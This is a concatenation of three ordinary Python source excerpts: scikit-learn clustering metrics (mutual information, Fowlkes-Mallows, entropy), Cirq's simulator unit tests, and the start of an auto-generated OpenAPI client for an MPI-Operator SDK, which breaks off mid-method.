    AMI rescales the mutual information so that its expected value under
    random labelings is 0: chance agreement no longer inflates the score
    as the number of clusters grows.  The adjustment used is::

        AMI(U, V) = [MI(U, V) - E(MI(U, V))] / [avg(H(U), H(V)) - E(MI(U, V))]

    The score is invariant under permutations of the label values and is
    symmetric in its two arguments, so it can compare two independent
    labelings of the same data when no ground truth is known.  Be mindful
    that it is an order of magnitude slower than other metrics, such as
    the Adjusted Rand Index.

    Read more in the :ref:`User Guide <mutual_info_score>`.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        A clustering of the data into disjoint subsets.

    labels_pred : array, shape = [n_samples]
        A clustering of the data into disjoint subsets.

    average_method : string, optional (default: 'arithmetic')
        How to compute the normalizer in the denominator. Possible options
        are 'min', 'geometric', 'arithmetic', and 'max'.

        .. versionadded:: 0.20

        .. versionchanged:: 0.22
           The default value of ``average_method`` changed from 'max' to
           'arithmetic'.

    Returns
    -------
    ami: float (upperlimited by 1.0)
        1.0 when the two partitions are identical (ie perfectly matched).
        Random (independent) partitions score around 0 on average and may
        be negative.

    See also
    --------
    adjusted_rand_score: Adjusted Rand Index
    mutual_info_score: Mutual Information (not adjusted for chance)

    References
    ----------
    .. [1] `Vinh, Epps, and Bailey, (2010). Information Theoretic Measures for
       Clusterings Comparison: Variants, Properties, Normalization and
       Correction for Chance, JMLR
       <http://jmlr.csail.mit.edu/papers/volume11/vinh10a/vinh10a.pdf>`_

    .. [2] `Wikipedia entry for the Adjusted Mutual Information
       <https://en.wikipedia.org/wiki/Adjusted_Mutual_Information>`_
    """
    labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
    n_samples = labels_true.shape[0]
    n_classes = np.unique(labels_true).shape[0]
    n_clusters = np.unique(labels_pred).shape[0]
    # Degenerate case: both labelings consist of a single cluster (or are
    # empty).  There is nothing to disagree about, so call it a perfect
    # match and return 1.0.
    if n_classes == n_clusters and n_classes in (0, 1):
        return 1.0
    contingency = contingency_matrix(labels_true, labels_pred, sparse=True)
    contingency = contingency.astype(np.float64,
                                     **_astype_copy_false(contingency))
    # Observed MI of the two clusterings, and its expected value under the
    # permutation model.
    mi = mutual_info_score(labels_true, labels_pred, contingency=contingency)
    emi = expected_mutual_information(contingency, n_samples)
    # Normalizer: the chosen generalized mean of the marginal entropies.
    normalizer = _generalized_average(entropy(labels_true),
                                      entropy(labels_pred),
                                      average_method)
    denominator = normalizer - emi
    # normalizer should always be >= emi, but floating-point representation
    # can make the difference come out slightly negative.  Clamp away from
    # zero while preserving the sign so a perfect match never becomes
    # 0.0 / 0.0.
    eps = np.finfo('float64').eps
    if denominator < 0:
        denominator = min(denominator, -eps)
    else:
        denominator = max(denominator, eps)
    return (mi - emi) / denominator
def normalized_mutual_info_score(labels_true, labels_pred,
                                 average_method='arithmetic'):
    """Normalized Mutual Information between two clusterings.

    NMI scales the mutual information into [0, 1] (0: no mutual
    information, 1: perfect correlation) by dividing it by a generalized
    mean of ``H(labels_true)`` and ``H(labels_pred)``, selected by
    ``average_method``.

    The measure is invariant under permutations of the label values and
    symmetric in its two arguments, so it can compare two independent
    labelings of the same data.  It is *not* adjusted for chance;
    :func:`adjusted_mutual_info_score` might be preferred.

    Read more in the :ref:`User Guide <mutual_info_score>`.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        A clustering of the data into disjoint subsets.

    labels_pred : array, shape = [n_samples]
        A clustering of the data into disjoint subsets.

    average_method : string, optional (default: 'arithmetic')
        How to compute the normalizer in the denominator. Possible options
        are 'min', 'geometric', 'arithmetic', and 'max'.

        .. versionadded:: 0.20

        .. versionchanged:: 0.22
           The default value of ``average_method`` changed from 'geometric'
           to 'arithmetic'.

    Returns
    -------
    nmi : float
        Score between 0.0 and 1.0; 1.0 stands for a perfectly complete
        labeling.

    See also
    --------
    v_measure_score: V-Measure (NMI with arithmetic mean option.)
    adjusted_rand_score: Adjusted Rand Index
    adjusted_mutual_info_score: Adjusted Mutual Information (adjusted
        against chance)
    """
    labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
    n_classes = np.unique(labels_true).shape[0]
    n_clusters = np.unique(labels_pred).shape[0]
    # Degenerate case: both labelings are a single cluster (or empty); the
    # data is not split at all, which counts as a perfect match.
    if n_classes == n_clusters and n_classes in (0, 1):
        return 1.0
    contingency = contingency_matrix(labels_true, labels_pred, sparse=True)
    contingency = contingency.astype(np.float64,
                                     **_astype_copy_false(contingency))
    # MI of the two clusterings.
    mi = mutual_info_score(labels_true, labels_pred, contingency=contingency)
    # Generalized mean of the marginal entropies; floor it at machine
    # epsilon so a zero-entropy labeling does not produce 0.0 / 0.0.
    normalizer = _generalized_average(entropy(labels_true),
                                      entropy(labels_pred),
                                      average_method)
    normalizer = max(normalizer, np.finfo('float64').eps)
    return mi / normalizer
def fowlkes_mallows_score(labels_true, labels_pred, sparse=False):
    """Measure the similarity of two clusterings of a set of points.

    The Fowlkes-Mallows index (FMI) is the geometric mean of the pairwise
    precision and recall::

        FMI = TP / sqrt((TP + FP) * (TP + FN))

    where ``TP`` counts pairs of points placed in the same cluster by both
    ``labels_true`` and ``labels_pred``, ``FP`` pairs grouped together
    only in ``labels_true``, and ``FN`` pairs grouped together only in
    ``labels_pred``.  The score ranges from 0 to 1; a high value indicates
    a good similarity between the two clusterings.

    Read more in the :ref:`User Guide <fowlkes_mallows_scores>`.

    Parameters
    ----------
    labels_true : int array, shape = (``n_samples``,)
        A clustering of the data into disjoint subsets.

    labels_pred : array, shape = (``n_samples``, )
        A clustering of the data into disjoint subsets.

    sparse : bool
        Compute contingency matrix internally with sparse matrix.

    Returns
    -------
    score : float
        The resulting Fowlkes-Mallows score.

    References
    ----------
    .. [1] `E. B. Fowkles and C. L. Mallows, 1983. "A method for comparing two
       hierarchical clusterings". Journal of the American Statistical
       Association
       <http://wildfire.stat.ucla.edu/pdflibrary/fowlkes.pdf>`_

    .. [2] `Wikipedia entry for the Fowlkes-Mallows Index
       <https://en.wikipedia.org/wiki/Fowlkes-Mallows_index>`_
    """
    labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
    (n_samples,) = labels_true.shape
    cm = contingency_matrix(labels_true, labels_pred, sparse=True)
    cm = cm.astype(np.int64, **_astype_copy_false(cm))
    # Pair-agreement counts derived from the contingency matrix and its
    # marginals (each count includes every ordered pair once; the common
    # factor cancels in the ratio below).
    tk = np.dot(cm.data, cm.data) - n_samples
    pk = np.sum(np.asarray(cm.sum(axis=0)).ravel() ** 2) - n_samples
    qk = np.sum(np.asarray(cm.sum(axis=1)).ravel() ** 2) - n_samples
    if tk == 0.0:
        return 0.0
    # Multiply the two square roots rather than forming pk * qk directly,
    # which keeps the intermediate values small.
    return np.sqrt(tk / pk) * np.sqrt(tk / qk)
def entropy(labels):
    """Calculate the entropy of a label assignment.

    An empty labeling is defined here to have entropy 1.0.

    Parameters
    ----------
    labels : int array, shape = [n_samples]
        The labels
    """
    if len(labels) == 0:
        return 1.0
    _, label_idx = np.unique(labels, return_inverse=True)
    counts = np.bincount(label_idx).astype(np.float64)
    counts = counts[counts > 0]
    total = np.sum(counts)
    # Compute log(a / b) as log(a) - log(b) to limit precision loss.
    return -np.sum((counts / total) * (np.log(counts) - log(total)))
| |
# Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for simulator.py"""
import abc
from typing import Generic, Dict, Any, List, Sequence, Union
from unittest import mock
import duet
import numpy as np
import pytest
import cirq
from cirq import study
from cirq.sim.simulator import (
TStepResult,
TSimulatorState,
SimulatesAmplitudes,
SimulatesExpectationValues,
SimulatesFinalState,
SimulatesIntermediateState,
SimulatesSamples,
SimulationTrialResult,
TActOnArgs,
)
class FakeSimulatesSamples(SimulatesSamples):
    """A `SimulatesSamples` stub whose `_run` always yields a preset result."""

    def __init__(self, run_output: Dict[str, np.ndarray]):
        self._canned_output = run_output

    def _run(self, *args, **kwargs) -> Dict[str, np.ndarray]:
        # Ignore the circuit/resolver/repetitions and hand back the canned data.
        return self._canned_output
class FakeStepResult(cirq.StepResult):
    """A `StepResult` stub: the configured qubits always sample 1, others 0."""

    def __init__(self, *, ones_qubits=None, final_state=None):
        self._ones_qubits = set(ones_qubits or [])
        self._final_state = final_state

    def _simulator_state(self):
        return self._final_state

    def state_vector(self):
        pass

    def __setstate__(self, state):
        pass

    def sample(self, qubits, repetitions=1, seed=None):
        # One identical row per repetition: True exactly for the "ones" qubits.
        row = [qubit in self._ones_qubits for qubit in qubits]
        return np.array([row] * repetitions)
class SimulatesIntermediateStateImpl(
    Generic[TStepResult, TSimulatorState, TActOnArgs],
    SimulatesIntermediateState[TStepResult, 'SimulationTrialResult', TSimulatorState, TActOnArgs],
    metaclass=abc.ABCMeta,
):
    """A SimulatesIntermediateState specialized to the stock SimulationTrialResult."""

    def _create_simulator_trial_result(
        self,
        params: study.ParamResolver,
        measurements: Dict[str, np.ndarray],
        final_step_result: TStepResult,
    ) -> 'SimulationTrialResult':
        """Bundle one simulation run into a default trial result.

        Args:
            params: The ParamResolver for this trial.
            measurements: The measurement results for this trial.
            final_step_result: The final step result of the simulation.

        Returns:
            The SimulationTrialResult.
        """
        trial_result = SimulationTrialResult(
            params=params, measurements=measurements, final_step_result=final_step_result
        )
        return trial_result
def test_run_simulator_run():
    # `run` should package the sampler's raw records with the resolver used.
    records = {'a': np.array([[[1]]])}
    sim = FakeSimulatesSamples(records)
    circuit = cirq.Circuit(cirq.measure(cirq.LineQubit(0), key='k'))
    resolver = cirq.ParamResolver({})
    actual = sim.run(program=circuit, repetitions=10, param_resolver=resolver)
    assert actual == cirq.ResultDict(records=records, params=resolver)
def test_run_simulator_sweeps():
    # `run_sweep` should yield one ResultDict per parameter resolver.
    records = {'a': np.array([[[1]]])}
    sim = FakeSimulatesSamples(records)
    circuit = cirq.Circuit(cirq.measure(cirq.LineQubit(0), key='k'))
    resolvers = [cirq.ParamResolver({}), cirq.ParamResolver({})]
    expected = [cirq.ResultDict(records=records, params=r) for r in resolvers]
    assert sim.run_sweep(program=circuit, repetitions=10, params=resolvers) == expected
def test_run_simulator_sweeps_with_deprecated_run():
    # `_run` returns 2D per-key arrays (the pre-v0.15 shape); `run_sweep`
    # still accepts them, upgrading to 3D records and warning about it.
    legacy_measurements = {'a': np.array([[1]])}
    sim = FakeSimulatesSamples(legacy_measurements)
    circuit = cirq.Circuit(cirq.measure(cirq.LineQubit(0), key='k'))
    resolvers = [cirq.ParamResolver({}), cirq.ParamResolver({})]
    upgraded_records = {'a': np.array([[[1]]])}
    expected = [cirq.ResultDict(records=upgraded_records, params=r) for r in resolvers]
    with cirq.testing.assert_deprecated(
        'values in the output of simulator._run must be 3D',
        deadline='v0.15',
    ):
        assert sim.run_sweep(program=circuit, repetitions=10, params=resolvers) == expected
@mock.patch.multiple(
    SimulatesIntermediateStateImpl, __abstractmethods__=set(), simulate_moment_steps=mock.Mock()
)
def test_intermediate_simulator():
    # Clearing __abstractmethods__ makes the abstract class instantiable;
    # simulate_moment_steps is replaced by a mock scripted via `steps` below.
    simulator = SimulatesIntermediateStateImpl()
    final_simulator_state = np.array([1, 0, 0, 0])
    def steps(*args, **kwargs):
        # Stand-in for simulate_moment_steps: yields two step results, the
        # second one carrying the final simulator state.
        result = mock.Mock()
        result.measurements = {'a': [True, True]}
        yield result
        result = mock.Mock()
        result.measurements = {'b': [True, False]}
        result._simulator_state.return_value = final_simulator_state
        yield result
    simulator.simulate_moment_steps.side_effect = steps
    circuit = mock.Mock(cirq.Circuit)
    param_resolver = mock.Mock(cirq.ParamResolver)
    param_resolver.param_dict = {}
    qubit_order = mock.Mock(cirq.QubitOrder)
    result = simulator.simulate(
        program=circuit, param_resolver=param_resolver, qubit_order=qubit_order, initial_state=2
    )
    # Measurements from all yielded steps are merged into one trial result,
    # which also records the resolver and the final simulator state.
    np.testing.assert_equal(result.measurements['a'], [True, True])
    np.testing.assert_equal(result.measurements['b'], [True, False])
    assert set(result.measurements.keys()) == {'a', 'b'}
    assert result.params == param_resolver
    np.testing.assert_equal(result._final_simulator_state, final_simulator_state)
@mock.patch.multiple(
    SimulatesIntermediateStateImpl, __abstractmethods__=set(), simulate_moment_steps=mock.Mock()
)
def test_intermediate_sweeps():
    # Instantiable thanks to the cleared __abstractmethods__.  Using a
    # generator *function* as side_effect gives a fresh iterator per call,
    # i.e. once per parameter resolver in the sweep.
    simulator = SimulatesIntermediateStateImpl()
    final_state = np.array([1, 0, 0, 0])
    def steps(*args, **kwargs):
        # Single step carrying both a measurement and the final state.
        result = mock.Mock()
        result.measurements = {'a': np.array([True, True])}
        result._simulator_state.return_value = final_state
        yield result
    simulator.simulate_moment_steps.side_effect = steps
    circuit = mock.Mock(cirq.Circuit)
    param_resolvers = [mock.Mock(cirq.ParamResolver), mock.Mock(cirq.ParamResolver)]
    for resolver in param_resolvers:
        resolver.param_dict = {}
    qubit_order = mock.Mock(cirq.QubitOrder)
    results = simulator.simulate_sweep(
        program=circuit, params=param_resolvers, qubit_order=qubit_order, initial_state=2
    )
    # One trial result per resolver is expected.  A FakeStepResult with the
    # same final state is equality-equivalent to the mocked step result here.
    final_step_result = FakeStepResult(final_state=final_state)
    expected_results = [
        cirq.SimulationTrialResult(
            measurements={'a': np.array([True, True])},
            params=param_resolvers[0],
            final_step_result=final_step_result,
        ),
        cirq.SimulationTrialResult(
            measurements={'a': np.array([True, True])},
            params=param_resolvers[1],
            final_step_result=final_step_result,
        ),
    ]
    assert results == expected_results
def test_step_sample_measurement_ops():
    # Default keys are the comma-joined qubit names; only q1 reads as 1.
    q0, q1, q2 = cirq.LineQubit.range(3)
    step_result = FakeStepResult(ones_qubits=[q1])
    samples = step_result.sample_measurement_ops([cirq.measure(q0, q1), cirq.measure(q2)])
    np.testing.assert_equal(samples, {'0,1': [[False, True]], '2': [[False]]})
def test_step_sample_measurement_ops_repetitions():
    # Each key gets one identical row per repetition.
    q0, q1, q2 = cirq.LineQubit.range(3)
    step_result = FakeStepResult(ones_qubits=[q1])
    samples = step_result.sample_measurement_ops(
        [cirq.measure(q0, q1), cirq.measure(q2)], repetitions=3
    )
    np.testing.assert_equal(samples, {'0,1': [[False, True]] * 3, '2': [[False]] * 3})
def test_step_sample_measurement_ops_invert_mask():
    # The invert mask flips the first qubit of the first measurement,
    # turning its False into True; the explicit False mask is a no-op.
    q0, q1, q2 = cirq.LineQubit.range(3)
    step_result = FakeStepResult(ones_qubits=[q1])
    ops = [
        cirq.measure(q0, q1, invert_mask=(True,)),
        cirq.measure(q2, invert_mask=(False,)),
    ]
    samples = step_result.sample_measurement_ops(ops)
    np.testing.assert_equal(samples, {'0,1': [[True, True]], '2': [[False]]})
def test_step_sample_measurement_ops_no_measurements():
    # No measurement ops means an empty measurement dict.
    assert FakeStepResult(ones_qubits=[]).sample_measurement_ops([]) == {}
def test_step_sample_measurement_ops_not_measurement():
    # Non-measurement operations are rejected outright.
    qubit = cirq.LineQubit(0)
    with pytest.raises(ValueError, match='MeasurementGate'):
        FakeStepResult(ones_qubits=[qubit]).sample_measurement_ops([cirq.X(qubit)])
def test_step_sample_measurement_ops_repeated_qubit():
    # Measuring q0 twice reuses its default key '0', which is an error.
    q0, q1, q2 = cirq.LineQubit.range(3)
    ops = [cirq.measure(q0), cirq.measure(q1, q2), cirq.measure(q0)]
    with pytest.raises(ValueError, match='Measurement key 0 repeated'):
        FakeStepResult(ones_qubits=[q0]).sample_measurement_ops(ops)
def test_simulation_trial_result_equality():
    eq = cirq.testing.EqualsTester()
    final_step_result = FakeStepResult(final_state=())
    # Same params / measurements / final state: one equality group.
    eq.add_equality_group(
        cirq.SimulationTrialResult(
            params=cirq.ParamResolver({}), measurements={}, final_step_result=final_step_result
        ),
        cirq.SimulationTrialResult(
            params=cirq.ParamResolver({}), measurements={}, final_step_result=final_step_result
        ),
    )
    # Different params: a distinct group.
    eq.add_equality_group(
        cirq.SimulationTrialResult(
            params=cirq.ParamResolver({'s': 1}),
            measurements={},
            final_step_result=final_step_result,
        )
    )
    # Different measurements: another distinct group.
    eq.add_equality_group(
        cirq.SimulationTrialResult(
            params=cirq.ParamResolver({'s': 1}),
            measurements={'m': np.array([1])},
            final_step_result=final_step_result,
        )
    )
    # Mutating the shared step result's final state must also change
    # equality: identical constructor arguments now form a new group.
    final_step_result._final_state = (0, 1)
    eq.add_equality_group(
        cirq.SimulationTrialResult(
            params=cirq.ParamResolver({'s': 1}),
            measurements={'m': np.array([1])},
            final_step_result=final_step_result,
        )
    )
def test_simulation_trial_result_repr():
    # The repr embeds the params, measurements and final simulator state.
    trial = cirq.SimulationTrialResult(
        params=cirq.ParamResolver({'s': 1}),
        measurements={'m': np.array([1])},
        final_step_result=FakeStepResult(final_state=(0, 1)),
    )
    expected = (
        "cirq.SimulationTrialResult("
        "params=cirq.ParamResolver({'s': 1}), "
        "measurements={'m': array([1])}, "
        "final_simulator_state=(0, 1))"
    )
    assert repr(trial) == expected
def test_simulation_trial_result_str():
    final_step_result = FakeStepResult(final_state=(0, 1))

    def result_str(measurements):
        # Build a trial result with the given measurements and render it.
        return str(
            cirq.SimulationTrialResult(
                params=cirq.ParamResolver({'s': 1}),
                measurements=measurements,
                final_step_result=final_step_result,
            )
        )

    # No measurements at all.
    assert result_str({}) == '(no measurements)'
    # Single-digit values are concatenated without separators...
    assert result_str({'m': np.array([1])}) == 'm=1'
    assert result_str({'m': np.array([1, 2, 3])}) == 'm=123'
    # ...while multi-digit values are space-separated.
    assert result_str({'m': np.array([9, 10, 11])}) == 'm=9 10 11'
def test_pretty_print():
    result = cirq.SimulationTrialResult(cirq.ParamResolver(), {}, np.array([1]))

    class FakePrinter:
        """Accumulates text() calls, mimicking IPython's pretty printer."""

        def __init__(self):
            self.text_pretty = ''

        def text(self, to_print):
            self.text_pretty += to_print

    # Normal (non-cycle) Jupyter console rendering.
    printer = FakePrinter()
    result._repr_pretty_(printer, False)
    assert printer.text_pretty == '(no measurements)'
    # When a reference cycle is detected, a placeholder is printed instead.
    printer = FakePrinter()
    result._repr_pretty_(printer, True)
    assert printer.text_pretty == 'SimulationTrialResult(...)'
@duet.sync
async def test_async_sample():
    # run_async should resolve to the same records the sampler produced.
    expected = {'mock': np.array([[[0]], [[1]]])}
    simulator = FakeSimulatesSamples(expected)
    qubit = cirq.LineQubit(0)
    future = simulator.run_async(cirq.Circuit(cirq.measure(qubit)), repetitions=10)
    result = await future
    np.testing.assert_equal(result.records, expected)
def test_simulation_trial_result_qubit_map():
    # Both simulators expose the same qubit -> index mapping.
    q = cirq.LineQubit.range(2)
    circuit = cirq.Circuit([cirq.CZ(q[0], q[1])])
    for sim in (cirq.Simulator(), cirq.DensityMatrixSimulator()):
        assert sim.simulate(circuit).qubit_map == {q[0]: 0, q[1]: 1}
def test_sample_repeated_measurement_keys():
    # Two measurements sharing a key become two records under that key.
    q = cirq.LineQubit.range(2)
    circuit = cirq.Circuit(
        [
            cirq.measure(q[0], key='a'),
            cirq.measure(q[1], key='a'),
            cirq.measure(q[0], key='b'),
            cirq.measure(q[1], key='b'),
        ]
    )
    result = cirq.sample(circuit)
    for key in ('a', 'b'):
        # One repetition, holding two instances of the key.
        assert len(result.records[key]) == 1
        assert len(result.records[key][0]) == 2
def test_simulate_with_invert_mask():
    class PlusGate(cirq.Gate):
        """A qudit gate that increments a qudit state mod its dimension."""
        def __init__(self, dimension, increment=1):
            self.dimension = dimension
            self.increment = increment % dimension
        def _qid_shape_(self):
            return (self.dimension,)
        def _unitary_(self):
            # Cyclic permutation matrix: roll the identity down by `inc`
            # rows so that |k> maps to |k + inc mod dimension>.
            inc = (self.increment - 1) % self.dimension + 1
            u = np.empty((self.dimension, self.dimension))
            u[inc:] = np.eye(self.dimension)[:-inc]
            u[:inc] = np.eye(self.dimension)[-inc:]
            return u
    q0, q1, q2, q3, q4 = cirq.LineQid.for_qid_shape((2, 3, 3, 3, 4))
    c = cirq.Circuit(
        PlusGate(2, 1)(q0),
        PlusGate(3, 1)(q2),
        PlusGate(3, 2)(q3),
        PlusGate(4, 3)(q4),
        # Pre-mask values are (1, 0, 1, 2, 3).  The mask covers only the
        # first four qubits; per the expected output it flips 0<->1,
        # leaves the qudit value 2 unchanged, and q4 is unmasked.
        cirq.measure(q0, q1, q2, q3, q4, key='a', invert_mask=(True,) * 4),
    )
    assert np.all(cirq.Simulator().run(c).measurements['a'] == [[0, 1, 0, 2, 3]])
def test_monte_carlo_on_unknown_channel():
    class Reset11To00(cirq.Gate):
        # Channel defined only via Kraus operators: maps |11> to |00> and
        # acts as the identity on every other basis state.
        def num_qubits(self) -> int:
            return 2
        def _kraus_(self):
            return [
                np.eye(4) - cirq.one_hot(index=(3, 3), shape=(4, 4), dtype=np.complex64),
                cirq.one_hot(index=(0, 3), shape=(4, 4), dtype=np.complex64),
            ]
    for k in range(4):
        out = cirq.Simulator().simulate(
            cirq.Circuit(Reset11To00().on(*cirq.LineQubit.range(2))),
            initial_state=k,
        )
        # States 0..2 are untouched; state 3 (|11>) resets to 0 == 3 % 3,
        # so `k % 3` gives the expected one-hot index in every case.
        np.testing.assert_allclose(
            out.state_vector(), cirq.one_hot(index=k % 3, shape=4, dtype=np.complex64), atol=1e-8
        )
def test_iter_definitions():
    # A placeholder trial result for the fake simulate_sweep below.
    dummy_trial_result = SimulationTrialResult(
        params={}, measurements={}, final_step_result=FakeStepResult(final_state=[])
    )
    class FakeNonIterSimulatorImpl(
        SimulatesAmplitudes,
        SimulatesExpectationValues,
        SimulatesFinalState,
    ):
        """A class which defines the non-Iterator simulator API methods.

        After v0.12, simulators are expected to implement the *_iter methods.
        """
        def compute_amplitudes_sweep(
            self,
            program: 'cirq.AbstractCircuit',
            bitstrings: Sequence[int],
            params: study.Sweepable,
            qubit_order: cirq.QubitOrderOrList = cirq.QubitOrder.DEFAULT,
        ) -> Sequence[Sequence[complex]]:
            return [[1.0]]
        def simulate_expectation_values_sweep(
            self,
            program: 'cirq.AbstractCircuit',
            observables: Union['cirq.PauliSumLike', List['cirq.PauliSumLike']],
            params: 'study.Sweepable',
            qubit_order: cirq.QubitOrderOrList = cirq.QubitOrder.DEFAULT,
            initial_state: Any = None,
            permit_terminal_measurements: bool = False,
        ) -> List[List[float]]:
            return [[1.0]]
        def simulate_sweep(
            self,
            program: 'cirq.AbstractCircuit',
            params: study.Sweepable,
            qubit_order: cirq.QubitOrderOrList = cirq.QubitOrder.DEFAULT,
            initial_state: Any = None,
        ) -> List[SimulationTrialResult]:
            return [dummy_trial_result]
    non_iter_sim = FakeNonIterSimulatorImpl()
    q0 = cirq.LineQubit(0)
    circuit = cirq.Circuit(cirq.X(q0))
    bitstrings = [0b0]
    params = {}
    # Each *_iter method should be derived from its non-iterator
    # counterpart and yield the same values one at a time.
    assert non_iter_sim.compute_amplitudes_sweep(circuit, bitstrings, params) == [[1.0]]
    amp_iter = non_iter_sim.compute_amplitudes_sweep_iter(circuit, bitstrings, params)
    assert next(amp_iter) == [1.0]
    obs = cirq.X(q0)
    assert non_iter_sim.simulate_expectation_values_sweep(circuit, obs, params) == [[1.0]]
    ev_iter = non_iter_sim.simulate_expectation_values_sweep_iter(circuit, obs, params)
    assert next(ev_iter) == [1.0]
    assert non_iter_sim.simulate_sweep(circuit, params) == [dummy_trial_result]
    state_iter = non_iter_sim.simulate_sweep_iter(circuit, params)
    assert next(state_iter) == dummy_trial_result
def test_missing_iter_definitions():
    class FakeMissingIterSimulatorImpl(
        SimulatesAmplitudes,
        SimulatesExpectationValues,
        SimulatesFinalState,
    ):
        """A simulator that defines neither the plain nor the *_iter methods."""

    # With neither side of each default-implementation pair overridden, the
    # two defaults delegate to each other until recursion blows up.
    sim = FakeMissingIterSimulatorImpl()
    q0 = cirq.LineQubit(0)
    circuit = cirq.Circuit(cirq.X(q0))
    bitstrings = [0b0]
    params = {}
    obs = cirq.X(q0)
    with pytest.raises(RecursionError):
        sim.compute_amplitudes_sweep(circuit, bitstrings, params)
    with pytest.raises(RecursionError):
        next(sim.compute_amplitudes_sweep_iter(circuit, bitstrings, params))
    with pytest.raises(RecursionError):
        sim.simulate_expectation_values_sweep(circuit, obs, params)
    with pytest.raises(RecursionError):
        next(sim.simulate_expectation_values_sweep_iter(circuit, obs, params))
    with pytest.raises(RecursionError):
        sim.simulate_sweep(circuit, params)
    with pytest.raises(RecursionError):
        next(sim.simulate_sweep_iter(circuit, params))
def test_trial_result_initializer():
    # Exactly one of the final-state arguments must be supplied: neither
    # (None, None) nor both provided is accepted.
    bad_arg_pairs = [(None, None), (object(), mock.Mock(TStepResult))]
    for state, step_result in bad_arg_pairs:
        with pytest.raises(ValueError, match='Exactly one of'):
            _ = SimulationTrialResult(cirq.ParamResolver(), {}, state, step_result)
| |
# coding: utf-8
"""
mpijob
Python SDK for MPI-Operator # noqa: E501
The version of the OpenAPI document: v2beta1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import atexit
import datetime
from dateutil.parser import parse
import json
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
import tempfile
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from mpijob.configuration import Configuration
import mpijob.models
from mpijob import rest
from mpijob.exceptions import ApiValueError, ApiException
class ApiClient(object):
    """Generic API client for OpenAPI client library builds.

    OpenAPI generic API client. This client handles the client-
    server communication, and is invariant across implementations. Specifics of
    the methods and models for each application are generated from the OpenAPI
    templates.

    NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.

    :param configuration: Configuration object for this client
    :param header_name: a header to pass when making calls to the API.
    :param header_value: a header value to pass when making calls to
        the API.
    :param cookie: a cookie to include in the header when making calls
        to the API
    :param pool_threads: The number of threads to use for async requests
        to the API. More threads means more concurrent API requests.
    """
    # Values passed through sanitize_for_serialization unchanged.
    PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
    # Maps OpenAPI schema type names to native Python types (deserialization).
    NATIVE_TYPES_MAPPING = {
        'int': int,
        'long': int if six.PY3 else long,  # noqa: F821
        'float': float,
        'str': str,
        'bool': bool,
        'date': datetime.date,
        'datetime': datetime.datetime,
        'object': object,
    }
    # Lazily-created ThreadPool for async requests; see the `pool` property.
    _pool = None
    def __init__(self, configuration=None, header_name=None, header_value=None,
                 cookie=None, pool_threads=1):
        """Initialize the client; see the class docstring for parameters."""
        if configuration is None:
            configuration = Configuration.get_default_copy()
        self.configuration = configuration
        self.pool_threads = pool_threads
        self.rest_client = rest.RESTClientObject(configuration)
        # default_headers must exist before the user_agent setter below,
        # since that setter writes into it.
        self.default_headers = {}
        if header_name is not None:
            self.default_headers[header_name] = header_value
        self.cookie = cookie
        # Set default User-Agent.
        self.user_agent = 'OpenAPI-Generator/0.1/python'
        self.client_side_validation = configuration.client_side_validation
    def __enter__(self):
        # Context-manager support: `with ApiClient(...) as client: ...`
        return self
    def __exit__(self, exc_type, exc_value, traceback):
        # Release the thread pool when leaving the `with` block.
        self.close()
    def close(self):
        """Shut down and discard the thread pool, if one was created."""
        if self._pool:
            self._pool.close()
            self._pool.join()
            self._pool = None
            # The pool property registered close() with atexit; remove that
            # hook now that cleanup is done (unregister is Python 3 only).
            if hasattr(atexit, 'unregister'):
                atexit.unregister(self.close)
    @property
    def pool(self):
        """Create thread pool on first request

        avoids instantiating unused threadpool for blocking clients.
        """
        if self._pool is None:
            # Register cleanup so the pool is joined at interpreter exit.
            atexit.register(self.close)
            self._pool = ThreadPool(self.pool_threads)
        return self._pool
    @property
    def user_agent(self):
        """User agent for this API client"""
        return self.default_headers['User-Agent']
    @user_agent.setter
    def user_agent(self, value):
        # Stored in default_headers, which are merged into every request.
        self.default_headers['User-Agent'] = value
    def set_default_header(self, header_name, header_value):
        """Set a header that will be merged into every request's headers."""
        self.default_headers[header_name] = header_value
    def __call_api(
            self, resource_path, method, path_params=None,
            query_params=None, header_params=None, body=None, post_params=None,
            files=None, response_types_map=None, auth_settings=None,
            _return_http_data_only=None, collection_formats=None,
            _preload_content=True, _request_timeout=None, _host=None,
            _request_auth=None):
        """Build and send one HTTP request, then post-process the response.

        Returns only the deserialized data when `_return_http_data_only`
        is set, otherwise a (data, status, headers) tuple; when
        `_preload_content` is false the un-deserialized response object is
        returned as-is.
        """
        config = self.configuration
        # header parameters
        header_params = header_params or {}
        header_params.update(self.default_headers)
        if self.cookie:
            header_params['Cookie'] = self.cookie
        if header_params:
            header_params = self.sanitize_for_serialization(header_params)
            header_params = dict(self.parameters_to_tuples(header_params,
                                                           collection_formats))
        # path parameters
        if path_params:
            path_params = self.sanitize_for_serialization(path_params)
            path_params = self.parameters_to_tuples(path_params,
                                                    collection_formats)
            for k, v in path_params:
                # specified safe chars, encode everything
                resource_path = resource_path.replace(
                    '{%s}' % k,
                    quote(str(v), safe=config.safe_chars_for_path_param)
                )
        # query parameters
        if query_params:
            query_params = self.sanitize_for_serialization(query_params)
            query_params = self.parameters_to_tuples(query_params,
                                                     collection_formats)
        # post parameters
        if post_params or files:
            post_params = post_params if post_params else []
            post_params = self.sanitize_for_serialization(post_params)
            post_params = self.parameters_to_tuples(post_params,
                                                    collection_formats)
            post_params.extend(self.files_parameters(files))
        # auth setting
        self.update_params_for_auth(
            header_params, query_params, auth_settings,
            request_auth=_request_auth)
        # body
        if body:
            body = self.sanitize_for_serialization(body)
        # request url
        if _host is None:
            url = self.configuration.host + resource_path
        else:
            # use server/host defined in path or operation instead
